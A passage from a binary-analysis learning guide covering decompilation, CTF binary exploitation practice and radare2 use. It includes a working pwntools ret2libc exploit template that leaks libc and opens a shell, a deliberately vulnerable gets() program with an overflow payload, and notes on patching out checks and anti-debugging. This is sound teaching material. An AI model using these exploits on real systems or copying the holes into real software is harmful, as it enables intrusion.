    mov  DWORD PTR [rbp-4], 0    ; local var at rbp-4
    .L2:
    cmp  DWORD PTR [rbp-4], 9
    jg   .L3
    mov  eax, DWORD PTR [rbp-4]
    mov  edi, eax
    call print_number
    add  DWORD PTR [rbp-4], 1
    jmp  .L2
    .L3:
    leave
    ret
    
  2. Manual decompilation steps:
    • Identify basic blocks (entry, loop header at .L2, loop body, exit at .L3)
    • Draw the CFG (entry → header → body → header, plus header → exit)
    • Recognize loop pattern (back edge from the jmp at the end of the loop body to .L2)
    • Identify loop counter ([rbp-4])
    • Translate to C:
      void function() {
          int i = 0;
          while (i <= 9) {
              print_number(i);
              i++;
          }
      }
      
  3. Document:
    • CFG: 4 blocks (entry, header, body, exit), 1 back edge
    • Loop type: while loop (could be for loop)
    • Variables: i (int, local at rbp-4)
    • Function calls: print_number(int)
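The block-splitting step of this exercise can be checked mechanically with the classic "leaders" rule: the first instruction, every jump target, and every instruction following a jump start a new basic block. The sketch below applies it to the listing from step 1. The tuple encoding and the `build_cfg` helper are illustrative assumptions, and `call` is treated as not ending a block, which is a common but not universal convention.

```python
# (label, mnemonic, operand) for the listing in step 1
LISTING = [
    (None,  "push",  "rbp"),
    (None,  "mov",   "rbp, rsp"),
    (None,  "sub",   "rsp, 16"),
    (None,  "mov",   "DWORD PTR [rbp-4], 0"),
    (".L2", "cmp",   "DWORD PTR [rbp-4], 9"),
    (None,  "jg",    ".L3"),
    (None,  "mov",   "eax, DWORD PTR [rbp-4]"),
    (None,  "mov",   "edi, eax"),
    (None,  "call",  "print_number"),
    (None,  "add",   "DWORD PTR [rbp-4], 1"),
    (None,  "jmp",   ".L2"),
    (".L3", "leave", ""),
    (None,  "ret",   ""),
]

COND_JUMPS = {"je", "jne", "jg", "jge", "jl", "jle"}


def build_cfg(listing):
    """Split a listing into basic blocks and return (blocks, edges)."""
    labels = {lab: i for i, (lab, _, _) in enumerate(listing) if lab}
    leaders = {0}
    for i, (_, op, arg) in enumerate(listing):
        if op == "jmp" or op in COND_JUMPS:
            leaders.add(labels[arg])           # jump target starts a block
            if i + 1 < len(listing):
                leaders.add(i + 1)             # so does the next instruction
        elif op == "ret" and i + 1 < len(listing):
            leaders.add(i + 1)

    starts = sorted(leaders)
    blocks = {}
    for n, start in enumerate(starts):
        end = starts[n + 1] if n + 1 < len(starts) else len(listing)
        blocks[start] = list(range(start, end))

    edges = set()
    for start, idxs in blocks.items():
        last = idxs[-1]
        _, op, arg = listing[last]
        if op == "jmp":
            edges.add((start, labels[arg]))
        elif op in COND_JUMPS:
            edges.add((start, labels[arg]))    # branch taken
            edges.add((start, last + 1))       # fall through
        elif op != "ret" and last + 1 < len(listing):
            edges.add((start, last + 1))
    return blocks, edges


blocks, edges = build_cfg(LISTING)
# In this linear layout an edge to an earlier address is a back edge.
back_edges = [(s, d) for s, d in sorted(edges) if d <= s]
print(sorted(blocks))   # [0, 4, 6, 11]
print(sorted(edges))    # [(0, 4), (4, 6), (4, 11), (6, 4)]
print(back_edges)       # [(6, 4)]
```

Blocks are named by the index of their first instruction, so the rule yields four blocks here (entry, the loop test at `.L2`, the loop body, and the exit at `.L3`) with a single back edge from the body to the loop test.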

The Interview Questions They’ll Ask

  1. “What’s the difference between disassembly and decompilation?”
    • Disassembly: machine code → assembly (close to a 1:1 mapping). Decompilation: assembly → high-level code (lossy, because many different sources compile to the same assembly).
  2. “Explain SSA form and why it’s used in decompilers.”
    • SSA: each variable assigned once. Simplifies data flow analysis, makes variable usage explicit, enables optimizations.
  3. “How do you detect a for loop vs while loop vs do-while in assembly?”
    • Pattern recognition in CFG: for has initialization, condition, increment. While: condition at start. Do-while: condition at end.
  4. “What makes control flow structuring hard?”
    • Irreducible graphs (can’t be structured without goto), optimizations create complex patterns, jump tables are indirect.
  5. “How would you infer that a variable is a pointer vs an integer?”
    • Pointer: dereferenced, used in lea, compared to addresses. Integer: used in arithmetic, compared to constants.
  6. “What’s a phi function in SSA form?”
    • Merges values from different control flow paths. Example: at loop header, phi(initial_value, updated_value).
  7. “Explain how you’d recover a struct from memory accesses.”
    • Group accesses by base pointer + offset. Offsets reveal field positions. Access widths (byte/word/dword/qword) reveal field sizes.
  8. “Why can’t decompilation be perfect?”
    • Information loss: variable names, comments, types, macros lost. Optimization obfuscates structure. Multiple source codes compile to same assembly.
  9. “How would you handle switch statements with jump tables?”
    • Detect: computed jump through table. Extract table from data section. Each entry is a case. Reconstruct switch statement.
  10. “Walk me through decompiling a simple function from scratch.”
    • Disassemble → build CFG → convert to SSA and run data flow analysis → type inference → control flow structuring → code generation → pretty print.
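The struct-recovery answer (question 7) can be sketched in a few lines: group observed memory accesses by base register, keep the widest access seen at each offset, and print a candidate layout. The access tuples, the `recover_structs` and `render` helpers, and the `field_<offset>` naming are all hypothetical; a real tool would first have to prove that the accesses share the same base pointer value.

```python
from collections import defaultdict


def recover_structs(accesses):
    """accesses: iterable of (base_register, offset, size_in_bytes)."""
    fields = defaultdict(dict)
    for base, offset, size in accesses:
        # Keep the widest access seen at each offset as the field size guess.
        fields[base][offset] = max(size, fields[base].get(offset, 0))
    return {base: sorted(f.items()) for base, f in fields.items()}


def render(name, layout):
    """Print a C-like struct for a list of (offset, size) pairs."""
    ctype = {1: "uint8_t", 2: "uint16_t", 4: "uint32_t", 8: "uint64_t"}
    lines = [f"struct {name} {{"]
    for offset, size in layout:
        lines.append(f"    {ctype[size]} field_{offset:x};  /* offset 0x{offset:x} */")
    lines.append("};")
    return "\n".join(lines)


# e.g. mov eax, [rdi] ; mov rdx, [rdi+8] ; movzx ecx, byte [rdi+4] ; mov rsi, [rdi+8]
observed = [("rdi", 0, 4), ("rdi", 8, 8), ("rdi", 4, 1), ("rdi", 8, 8)]
layouts = recover_structs(observed)
print(render("s_rdi", layouts["rdi"]))
```

Gaps between fields (offsets 5 to 7 here) may be padding or simply fields the function never touched, which is one reason type recovery stays ambiguous.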

Books That Will Help

Topic | Book | Chapters
Control Flow Analysis | “Engineering a Compiler” by Cooper & Torczon | Ch 8-9
Compiler Fundamentals | “Compilers: Principles, Techniques, and Tools” (Dragon Book) | Ch 8-9
Binary Analysis | “Practical Binary Analysis” by Dennis Andriesse | Ch 6-7
Machine-Level Details | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch 3
Assembly Language | “Low-Level Programming” by Igor Zhirkov | Ch 4-5
Advanced Topics | Research papers on decompilation | “Native x86 Decompilation Using Semantics-Preserving Structural Analysis”; “No More Gotos: Decompilation Using Pattern-Independent Control-Flow Structuring”

Project 16: CTF Binary Exploitation Practice

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python (pwntools)
  • Alternative Programming Languages: Shell scripting
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 3: Advanced
  • Knowledge Area: CTF / Competitive Hacking
  • Software or Tool: pwntools, Docker, CTF platforms
  • Main Book: “CTF Field Guide” (Trail of Bits)

What you’ll build: Solve 20+ CTF pwn challenges from various difficulty levels, building a personal exploit template library.

Why it teaches binary analysis: CTF challenges are designed to teach specific concepts. They provide immediate feedback and gamified learning.

Core challenges you’ll face:

  • Various vulnerability types → maps to stack, heap, format string
  • Different protections → maps to ASLR, NX, canary, PIE
  • Time pressure → maps to efficient analysis workflow
  • Novel techniques → maps to learning new tricks

Resources for key challenges:

Key Concepts:

  • Challenge Categories: CTF101.org
  • Exploit Primitives: “The Shellcoder’s Handbook”
  • Advanced Techniques: CTF writeups

Difficulty: Advanced
Time estimate: Ongoing (2+ months)
Prerequisites: Projects 7-8 (Buffer Overflow, ROP)

Real world outcome:

# Exploit template
from pwn import *

# Configuration
binary = './challenge'
libc_path = './libc.so.6' if args.REMOTE else '/lib/x86_64-linux-gnu/libc.so.6'
host, port = 'challenge.ctf.com', 1337

# Setup
elf = context.binary = ELF(binary)
libc = ELF(libc_path)

def conn():
    if args.REMOTE:
        return remote(host, port)
    elif args.GDB:
        return gdb.debug(binary, '''
            break main
            continue
        ''')
    else:
        return process(binary)

# Gadgets
rop = ROP(elf)
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

# Exploit
def exploit():
    p = conn()

    # Stage 1: Leak libc
    payload = flat({
        0x48: pop_rdi,
        0x50: elf.got['puts'],
        0x58: elf.plt['puts'],
        0x60: elf.symbols['main']
    })

    p.sendlineafter(b'> ', payload)
    leak = u64(p.recvline().strip().ljust(8, b'\x00'))
    libc.address = leak - libc.symbols['puts']
    log.success(f'libc base: {hex(libc.address)}')

    # Stage 2: Shell
    payload = flat({
        0x48: ret,
        0x50: pop_rdi,
        0x58: next(libc.search(b'/bin/sh')),
        0x60: libc.symbols['system']
    })

    p.sendlineafter(b'> ', payload)
    p.interactive()

if __name__ == '__main__':
    exploit()

Implementation Hints:

Progression path:

  1. Stack challenges: Buffer overflow, ret2win
  2. ROP challenges: ret2libc, ROP chains
  3. Format string: Read/write primitives
  4. Heap challenges: Use-after-free, heap overflow
  5. Advanced: House of Force, tcache poisoning

Build your template library:

  • leak_libc.py - Standard libc leak pattern
  • rop_chain.py - ROP chain builder
  • format_string.py - Format string exploit
  • heap_exploit.py - Heap exploitation patterns

Practice platforms:

  • pwnable.kr (beginner-friendly)
  • ROP Emporium (ROP-focused)
  • pwnable.tw (advanced)
  • picoCTF (beginner)

Learning milestones:

  1. Solve 10 stack challenges → Master buffer overflows
  2. Solve 5 ROP challenges → Bypass NX
  3. Solve 5 format string → Arbitrary read/write
  4. Attempt heap challenges → Enter advanced territory

The Core Question You’re Answering

“How do you systematically discover and exploit vulnerabilities in compiled binaries, and why are CTF challenges the fastest way to master binary exploitation?”

This project is about deliberate practice. CTF (Capture The Flag) pwn challenges are carefully designed to teach specific exploitation techniques in a safe, legal environment. Unlike real-world vulnerabilities (which are rare and unpredictable), CTF challenges provide concentrated, progressive skill-building opportunities. You’ll develop the muscle memory and intuition that separates hobbyists from professional exploit developers.

Concepts You Must Understand First

  1. Stack-Based Buffer Overflows
    • The classic: writing past the end of a stack buffer to overwrite return addresses
    • Stack layout: local variables, saved frame pointer, return address, function arguments
    • Exploitation: overwrite return address to redirect execution

    Guiding Questions:

    • What’s the exact memory layout of a stack frame on x86-64?
    • How much offset do you need to reach the return address?
    • What’s the difference between x86 (32-bit) and x86-64 (64-bit) exploitation?

    Book References:

    • “Hacking: The Art of Exploitation” by Jon Erickson - Ch 0x300: Exploitation
    • “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron - Ch 3.7: Procedures (stack frame details)
  2. Return-Oriented Programming (ROP)
    • When DEP/NX prevents shellcode execution, chain existing code fragments (gadgets)
    • Gadget: short instruction sequence ending in ret
    • ROP chain: sequence of addresses that performs desired operations

    Guiding Questions:

    • Why does ROP bypass DEP/NX?
    • How do you find gadgets in a binary?
    • What’s the minimum set of gadgets needed for arbitrary code execution?

    Book References:

    • “Hacking: The Art of Exploitation” by Jon Erickson - Ch 0x300 (advanced exploitation)
    • “The Shellcoder’s Handbook” - Ch on ROP techniques
  3. Format String Vulnerabilities
    • printf(user_input) allows reading/writing arbitrary memory
    • %x reads stack, %n writes to addresses, %s dereferences pointers
    • Exploitation: leak addresses, overwrite GOT entries, arbitrary write

    Guiding Questions:

    • How does %n write to memory in printf?
    • How do you calculate the offset to your format string on the stack?
    • Why are format strings more powerful than buffer overflows?

    Book References:

    • “Hacking: The Art of Exploitation” by Jon Erickson - Ch 0x300: Format strings
    • “The Shellcoder’s Handbook” - Format string chapter
  4. Memory Protections (ASLR, DEP, Stack Canaries, PIE)
    • ASLR: randomizes addresses, defeats hardcoded exploits
    • DEP/NX: prevents code execution on stack/heap
    • Stack canaries: detect buffer overflows before return
    • PIE: code section also randomized

    Guiding Questions:

    • How do you bypass ASLR? (information leak + relative addressing)
    • What happens when a canary is overwritten?
    • Can you bypass all protections simultaneously?

    Book References:

    • “Practical Binary Analysis” by Dennis Andriesse - Ch 1: Security mechanisms
    • “Hacking: The Art of Exploitation” by Jon Erickson - Ch 0x500: Shellcode
  5. Heap Exploitation Basics
    • Heap allocators (malloc/free) have exploitable metadata
    • Use-after-free: accessing freed memory
    • Double-free: freeing same pointer twice
    • Heap overflow: overwriting heap metadata

    Guiding Questions:

    • How does malloc/free work internally?
    • What is a heap chunk header?
    • What’s the difference between fastbin, smallbin, largebin?

    Book References:

    • “The Shellcoder’s Handbook” - Heap exploitation chapters
    • Research papers on heap exploitation techniques
  6. Pwntools and Exploit Development Workflow
    • Pwntools: Python library for exploit development
    • Workflow: analyze binary → find vulnerability → develop exploit → test locally → remote exploitation
    • Automation: template scripts, reusable patterns

    Guiding Questions:

    • How do you interact with remote services in pwntools?
    • What’s the benefit of Python for exploit development?
    • How do you debug exploits that work locally but fail remotely?

    Book References:

    • Pwntools documentation
    • “CTF Field Guide” (Trail of Bits)
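The ASLR bypass described in concept 4 (information leak plus relative addressing) comes down to simple arithmetic once an address has been leaked. The sketch below uses only the standard library so it runs without pwntools. The two symbol offsets and the leaked bytes are made-up values for illustration; in a real exploit they would come from the target's libc (for example `libc.symbols['puts']`) and from the process output.

```python
import struct

# Hypothetical offsets of puts and system inside the target libc.
PUTS_OFFSET = 0x80E50
SYSTEM_OFFSET = 0x50D70


def parse_leak(line: bytes) -> int:
    """Convert the raw bytes printed by puts(puts@got) into an integer."""
    raw = line[:-1] if line.endswith(b"\n") else line
    # puts stops at the first NUL byte, so pad back up to 8 bytes.
    return struct.unpack("<Q", raw[:8].ljust(8, b"\x00"))[0]


def rebase(leak: int, leaked_offset: int, wanted_offset: int):
    """Return (libc_base, wanted_address) given one leaked symbol address."""
    base = leak - leaked_offset
    if base & 0xFFF:
        # A mapped library starts on a page boundary; anything else
        # usually means the wrong libc or a bad leak.
        raise ValueError(f"suspicious libc base {base:#x}")
    return base, base + wanted_offset


leaked_line = bytes.fromhex("500e281c3a7f") + b"\n"   # made-up process output
leak = parse_leak(leaked_line)
base, system_addr = rebase(leak, PUTS_OFFSET, SYSTEM_OFFSET)
print(hex(base), hex(system_addr))   # 0x7f3a1c200000 0x7f3a1c250d70
```

The page-alignment check is a cheap sanity test that catches most cases where the local and remote libc versions differ.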

Questions to Guide Your Design

  1. Which platform to start? pwnable.kr (beginner), ROP Emporium (ROP focus), or picoCTF (educational)?

  2. Systematic vs opportunistic learning? Follow structured curriculum or jump to interesting challenges?

  3. Template library strategy? Create reusable exploit patterns or write from scratch each time?

  4. How do you document solutions? Writeups for each challenge? Annotated exploit code?

  5. Local vs remote testing? Set up Docker containers locally or test directly on remote services?

  6. Tool choices? GDB with pwndbg/gef, radare2, or IDA for analysis?

  7. Collaboration approach? Solo learning or team/community collaboration?

  8. How do you handle getting stuck? Time-box before looking at hints/writeups?

Thinking Exercise

Before coding exploits, complete this analysis exercise:

  1. Analyze this vulnerable code:
    #include <stdio.h>
    #include <stdlib.h>
    
    void win() {
        system("/bin/sh");
    }
    
    void vuln() {
        char buffer[64];
        gets(buffer);  // Vulnerable!
    }
    
    int main() {
        vuln();
        return 0;
    }
    
  2. Manual exploitation steps:
    • Compile with gcc -o vuln vuln.c -fno-stack-protector -no-pie
    • Disassemble and find win() address
    • Calculate offset from buffer to return address
    • Craft payload: padding + win_address
    • Test locally: python -c 'print("A"*72 + "ABCD")' | ./vuln
  3. Document:
    • Vulnerability type: Stack buffer overflow
    • Protections disabled: No canary, no PIE
    • Win condition: Call win() function
    • Exploitation technique: Overwrite return address
    • Payload structure: [padding][win_address]
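The `[padding][win_address]` structure can be built explicitly with the standard library. This is a sketch under stated assumptions: the 72-byte offset matches the test command above (64-byte buffer plus 8 bytes of saved rbp) but depends on how the compiler lays out the frame, and `WIN_ADDR` is a placeholder, since the real address comes from disassembling your own build.

```python
import struct

BUFFER_SIZE = 64        # char buffer[64] in vuln()
SAVED_RBP_SIZE = 8      # saved frame pointer sits between buffer and return address
WIN_ADDR = 0x401156     # hypothetical address of win(); read yours from the disassembly


def build_payload(win_addr: int, offset: int = BUFFER_SIZE + SAVED_RBP_SIZE) -> bytes:
    """Padding up to the saved return address, then the new return address."""
    padding = b"A" * offset
    return padding + struct.pack("<Q", win_addr)   # little-endian 64-bit


payload = build_payload(WIN_ADDR)
print(len(payload))          # 80
print(payload[72:].hex())    # 5611400000000000
```

Writing the payload to a file (`open("payload", "wb").write(payload + b"\n")`) and running `./vuln < payload` avoids the byte-encoding problems that `print` introduces in Python 3. If the process crashes inside `system`, stack alignment is a likely cause, and placing the address of a lone `ret` gadget before `win_addr` is a common fix.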

The Interview Questions They’ll Ask

  1. “Walk me through exploiting a basic stack buffer overflow.”
    • Find overflow, calculate offset to return address, overwrite with target address (shellcode or win function).
  2. “What’s the difference between exploiting 32-bit vs 64-bit binaries?”
    • x86: args on stack. x86-64: args in registers (rdi, rsi, rdx, ...). Pointers 8 bytes vs 4. Different calling conventions.
  3. “Explain Return-Oriented Programming.”
    • Chain gadgets (code ending in ret) to perform operations when NX prevents shellcode. Each gadget address on stack acts as return address.
  4. “How do you bypass ASLR?”
    • Leak an address (format string, buffer over-read), calculate base from leak, use relative offsets.
  5. “What’s a format string vulnerability and why is it powerful?”
    • printf(user_input) allows reading stack (%x) and writing memory (%n). Can leak addresses and modify GOT/function pointers.
  6. “Explain stack canaries. How do you bypass them?”
    • Random value placed between the local buffers and the saved return address, checked before the function returns. Bypass: leak canary value, preserve it in overflow.
  7. “What’s a GOT overwrite and when is it useful?”
    • Global Offset Table holds addresses of library functions. Overwrite entry to hijack function calls. Useful when you can’t directly control execution.
  8. “Describe a use-after-free vulnerability.”
    • Accessing freed memory. Allocate new object in same location, old pointer now references new object. Type confusion or data leak.
  9. “What tools do you use for binary exploitation?”
    • pwntools (exploit development), GDB with pwndbg/gef (debugging), ROPgadget/ropper (gadget finding), checksec (protection checking).
  10. “What’s your methodology for approaching a new CTF pwn challenge?”
    • Check protections → run binary → analyze in debugger → identify vulnerability → develop exploit locally → adapt for remote.
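The "calculate offset to return address" step from the first answer is usually automated with a cyclic pattern: send a string in which every short window is unique, read the bytes that landed in the crashed return address, and look up their position. pwntools provides `cyclic()` and `cyclic_find()` for this; the stdlib-only sketch below uses the simpler upper/lower/digit scheme instead of a De Bruijn sequence, and the `pattern_create` / `pattern_offset` names are illustrative.

```python
import string
from itertools import product


def pattern_create(length: int) -> bytes:
    """Build 'Aa0Aa1Aa2...' so that every 4-byte window is unique."""
    out = []
    size = 0
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase,
                                       string.digits):
        if size >= length:
            break
        out.append(upper + lower + digit)
        size += 3
    return "".join(out)[:length].encode()


def pattern_offset(pattern: bytes, needle: bytes) -> int:
    """Return the offset of the bytes recovered from the crash, or -1."""
    return pattern.find(needle)


pattern = pattern_create(200)
# Pretend the debugger showed these 8 bytes in the saved return address slot.
crashed_with = pattern[72:80]
print(pattern[:12])                           # b'Aa0Aa1Aa2Aa3'
print(pattern_offset(pattern, crashed_with))  # 72
```

In GDB the needle would come from the value at `rsp` when the faulting `ret` executes, converted from little-endian back to bytes.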

Books That Will Help

Topic | Book | Chapters
Exploitation Fundamentals | “Hacking: The Art of Exploitation” by Jon Erickson | Ch 0x300: Exploitation; Ch 0x500: Shellcode
System Internals | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch 3: Machine-Level Representation; Ch 7: Linking
Binary Analysis | “Practical Binary Analysis” by Dennis Andriesse | Ch 1: Anatomy of a Binary; Ch 6: Binary Analysis Fundamentals
Assembly Language | “Low-Level Programming” by Igor Zhirkov | Ch 4-5: Assembly and Control Flow
Advanced Exploitation | “The Shellcoder’s Handbook” | ROP, Format Strings, Heap Exploitation chapters
Practical Guides | “CTF Field Guide” (Trail of Bits) | Available online
CTF Walkthroughs | “Nightmare” (guyinatuxedo) | Comprehensive CTF solutions, available on GitHub

Project 17: radare2 Mastery

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: r2 commands, r2pipe (Python)
  • Alternative Programming Languages: JavaScript (r2js)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Static Analysis / Command Line RE
  • Software or Tool: radare2, Cutter (GUI)
  • Main Book: “The radare2 Book”

What you’ll build: Complete analysis of binaries using only radare2’s command-line interface, plus automation with r2pipe.

Why it teaches binary analysis: radare2 is one of the most capable open-source RE frameworks. Its CLI forces you to think about what you’re doing.

Core challenges you’ll face:

  • Command syntax → maps to steep learning curve
  • Navigation → maps to moving through binaries
  • Visual mode → maps to interactive disassembly
  • Scripting → maps to r2pipe automation

Resources for key challenges:

Key Concepts:

  • Command Structure: radare2 book
  • Visual Mode: V and VV commands
  • r2pipe: Python bindings documentation

Difficulty: Intermediate
Time estimate: 2-3 weeks
Prerequisites: Projects 1-4

Real world outcome:

$ r2 ./crackme
[0x00401040]> aaa               # Analyze all
[0x00401040]> afl               # List functions
0x00401040    1 43           entry0
0x00401170    4 101          main
0x004011e0    3 67           sym.check_password

[0x00401040]> s main            # Seek to main
[0x00401170]> pdf               # Print disassembly function
            ; CODE XREF from entry0
┌ 101: int main (int argc, char **argv);
│           0x00401170      push rbp
│           0x00401171      mov rbp, rsp
│           0x00401174      sub rsp, 0x40
│           ...
│           0x004011a0      call sym.check_password
│           0x004011a5      test eax, eax
│       ┌─< 0x004011a7      je 0x4011b8
│       │   0x004011a9      lea rdi, str.Correct
│       │   0x004011b0      call sym.imp.puts

[0x00401170]> VV                # Visual graph mode
[0x00401170]> s sym.check_password
[0x004011e0]> pdg               # Decompile (requires the r2ghidra plugin)

int check_password(char *input) {
    return strcmp(input, "s3cr3t") == 0;
}

# r2pipe automation
$ python3
>>> import r2pipe
>>> r2 = r2pipe.open('./crackme')
>>> r2.cmd('aaa')
>>> functions = r2.cmdj('aflj')  # JSON output
>>> for f in functions:
...     print(f['name'], hex(f['offset']))

Implementation Hints:

Essential r2 commands:

# Analysis
aaa              # Analyze all
afl              # List functions
axt addr         # Xrefs to address
axf addr         # Xrefs from address
iz               # List strings
ii               # List imports

# Navigation
s addr           # Seek to address
s main           # Seek to function
sf               # Seek to next function
sb               # Seek to the start of the current basic block

# Disassembly
pd 20            # Print 20 instructions
pdf              # Print function disassembly
pdc              # Built-in pseudo-C output (r2ghidra adds pdg, r2dec adds pdd)
pdr              # Recursive disassembly across the function graph

# Visual mode
V                # Visual mode (press p to cycle views)
VV               # Visual graph mode
V!               # Visual panels mode

# Debugging
db addr          # Set breakpoint
dc               # Continue
ds               # Step
dr               # Show registers
doo              # Reopen for debugging

# Patching
wa nop           # Write assembly (nop)
wx 90            # Write hex bytes

Common workflows:

  1. aaa; afl - Analyze and list functions
  2. iz; iz~password - Find interesting strings
  3. axt str.password - Find references to string
  4. s ref; pdf - Go to reference, disassemble

Learning milestones:

  1. Basic navigation → Move around binaries
  2. Visual mode → Efficient analysis
  3. Find vulnerabilities → Locate interesting code
  4. Automate with r2pipe → Script your analysis

The Core Question You’re Answering

“How do you efficiently analyze and reverse engineer binaries using only a command-line interface, and why is mastering text-based tools essential for professional reverse engineering work?”

This project challenges you to think beyond GUI tools and understand reverse engineering at a fundamental level. When you can’t rely on visual cues and mouse clicks, you’re forced to understand the underlying concepts, develop systematic workflows, and build automation that scales to hundreds of binaries.

Concepts You Must Understand First

1. Command-Line Philosophy and UNIX Composability

  • radare2 follows the UNIX philosophy: small, composable commands that do one thing well
  • Understanding why ~ (internal grep), | (pipe to shell), and @ (temporary seek) exist
  • The power of combining simple commands to create complex analysis workflows

Guiding Questions:

  • Why does radare2 use single-letter commands instead of descriptive names?
  • How does the command prefix system (a=analysis, p=print, d=debug) help organize functionality?
  • What’s the advantage of pdf @ sym.main vs seeking to main first?

Book References:

  • “The radare2 Book” (online) - Chapter 1: Introduction, Chapter 4: Basic Usage
  • “The Art of UNIX Programming” by Eric S. Raymond - Chapter 1: Philosophy

2. Binary Analysis State and Context

  • Understanding the current seek position (like a cursor in your binary)
  • How radare2 maintains analysis state (function boundaries, cross-references, types)
  • The difference between ephemeral commands and persistent state changes

Guiding Questions:

  • What’s the difference between s main and @ main in terms of state?
  • How does aaa (analyze all) build the function database, and when should you use aa vs aaa vs aaaa?
  • Why might you want to save a project (Ps) instead of re-analyzing each time?

Book References:

  • “The radare2 Book” - Chapter 4: Basic Usage (Seeking and Navigation)
  • “Practical Binary Analysis” by Dennis Andriesse - Chapter 5: Basic Binary Analysis

3. Visual Mode as Interactive Disassembly

  • Visual mode (V) isn’t just pretty printing; it’s an interactive analysis workspace
  • Understanding the different visual panels (hex, disassembly, graph, debugging)
  • How visual mode keybindings map to command-line operations

Guiding Questions:

  • What’s the relationship between pressing p in visual mode and the pd command?
  • How does VV (visual graph mode) help you understand control flow better than linear disassembly?
  • When would you use visual panel mode (V!) with multiple panes?

Book References:

  • “The radare2 Book” - Chapter 6: Visual Mode
  • “Reversing: Secrets of Reverse Engineering” by Eldad Eilam - Chapter 4: Reverse Engineering

4. Cross-References and Program Flow

  • Cross-references (xrefs) are the roadmap of your binary: who calls what
  • Understanding axt (xrefs to) vs axf (xrefs from) vs ax (list all)
  • How to trace data flow and control flow through xref analysis

Guiding Questions:

  • If you find an interesting string, how do you find all code that uses it?
  • How do you determine if a function is called from multiple places or just one?
  • What’s the difference between code xrefs and data xrefs?

Book References:

  • “The radare2 Book” - Chapter 5: Analysis (Cross-References section)
  • “Practical Binary Analysis” by Dennis Andriesse - Chapter 6: Disassembly and Binary Analysis

5. r2pipe and Programmatic Analysis

  • r2pipe lets you control radare2 from any programming language
  • Understanding the JSON output mode (j suffix) for machine parsing
  • Building analysis pipelines that scale to multiple binaries

Guiding Questions:

  • Why would you use r2.cmdj('aflj') instead of parsing text output from afl?
  • How can you build a script that finds all functions using dangerous functions like strcpy?
  • What’s the advantage of r2pipe over scraping radare2 text output?

Book References:

  • “The radare2 Book” - Chapter 15: r2pipe
  • “Practical Binary Analysis” by Dennis Andriesse - Chapter 12: Principles of Dynamic Analysis
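One way to approach the strcpy question above is a function that asks radare2 for the import list and then for cross-references to each risky import. The sketch below takes any object with `cmd` and `cmdj` methods, so it can be exercised with a stand-in when radare2 is not installed. The JSON field names (`name` in `iij`, `fcn_name` in `axtj`) and the `sym.imp.<name>` flag convention are assumptions to verify against your radare2 version, and `FakeR2` with its canned data is purely illustrative.

```python
DANGEROUS = ("strcpy", "gets", "sprintf", "strcat")


def callers_of_dangerous(r2, names=DANGEROUS):
    """Map each risky import to the sorted list of functions referencing it."""
    r2.cmd("aaa")                                      # run analysis first
    imported = {imp.get("name") for imp in (r2.cmdj("iij") or [])}
    report = {}
    for name in names:
        if name not in imported:
            continue
        xrefs = r2.cmdj(f"axtj @ sym.imp.{name}") or []
        # Assumed field: 'fcn_name' holds the enclosing function, if any.
        report[name] = sorted({x.get("fcn_name", "?") for x in xrefs})
    return report


class FakeR2:
    """Stand-in with canned answers so the sketch runs without radare2."""

    def cmd(self, command):
        return ""

    def cmdj(self, command):
        if command == "iij":
            return [{"name": "strcpy"}, {"name": "puts"}]
        if command == "axtj @ sym.imp.strcpy":
            return [{"fcn_name": "sym.check_password", "from": 0x4011F0},
                    {"fcn_name": "main", "from": 0x401190}]
        return []


print(callers_of_dangerous(FakeR2()))
# {'strcpy': ['main', 'sym.check_password']}
```

Against a real binary, the same function would be called as `callers_of_dangerous(r2pipe.open('./crackme'))`. Passing the session in as a parameter is a deliberate choice: it keeps the analysis logic testable and lets one script loop over many binaries.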

6. Binary Patching and Modification

  • Understanding the difference between wa (write assembly), wx (write hex), and wao (modify the opcode at the current seek, e.g. wao nop)
  • How to patch binaries in place: open the file in write mode (r2 -w), or enable the write cache and manage pending changes with the wc commands
  • The concept of reversible vs permanent patches

Guiding Questions:

  • How do you NOP out a conditional jump to bypass a check?
  • What’s the difference between patching in-memory vs writing changes to disk?
  • How do you ensure your patch doesn’t break relocations or other code?

Book References:

  • “The radare2 Book” - Chapter 8: Writing and Patching
  • “Hacking: The Art of Exploitation” by Jon Erickson - Ch 0x300: Exploitation
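The first guiding question (NOP out a conditional jump) is easy to see at the byte level. A short `je` is the opcode `0x74` followed by a one-byte displacement, so overwriting both bytes with `0x90` removes the branch and execution falls through. The sketch below works on an in-memory copy of the code bytes; the `nop_short_jcc` helper is hypothetical and only handles the short `je`/`jne` encodings.

```python
JE_SHORT = 0x74    # je rel8
JNE_SHORT = 0x75   # jne rel8
NOP = 0x90


def nop_short_jcc(code: bytes, offset: int) -> bytes:
    """Return a copy of code with the 2-byte short je/jne at offset NOPed out."""
    if code[offset] not in (JE_SHORT, JNE_SHORT):
        raise ValueError(f"no short je/jne at offset {offset:#x}")
    patched = bytearray(code)
    patched[offset:offset + 2] = bytes([NOP, NOP])
    return bytes(patched)


# test eax, eax ; je +0x0f ; lea rdi, [rip+...] (first three bytes only)
original = bytes.fromhex("85c0740f488d3d")
patched = nop_short_jcc(original, 2)
print(original.hex())   # 85c0740f488d3d
print(patched.hex())    # 85c09090488d3d
```

Inside radare2 the equivalent edit is `wx 9090 @ <address of the je>` on a file opened with `r2 -w`. Keeping the patch the same length as the original instruction is what avoids shifting later code and breaking relative jumps.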

7. Analysis Automation with r2 Scripts

  • r2 scripts (.r2 files) let you automate repetitive analysis tasks
  • Understanding how to combine commands with ; and create macros
  • Building reusable analysis workflows

Guiding Questions:

  • How do you create a script that automatically finds and patches anti-debugging checks?
  • What’s the difference between running a script with . vs sourcing commands?
  • How can you make your analysis reproducible for team members?

Book References:

  • “The radare2 Book” - Chapter 14: Scripting
  • “Practical Binary Analysis” by Dennis Andriesse - Chapter 13: Binary Instrumentation

Questions to Guide Your Design

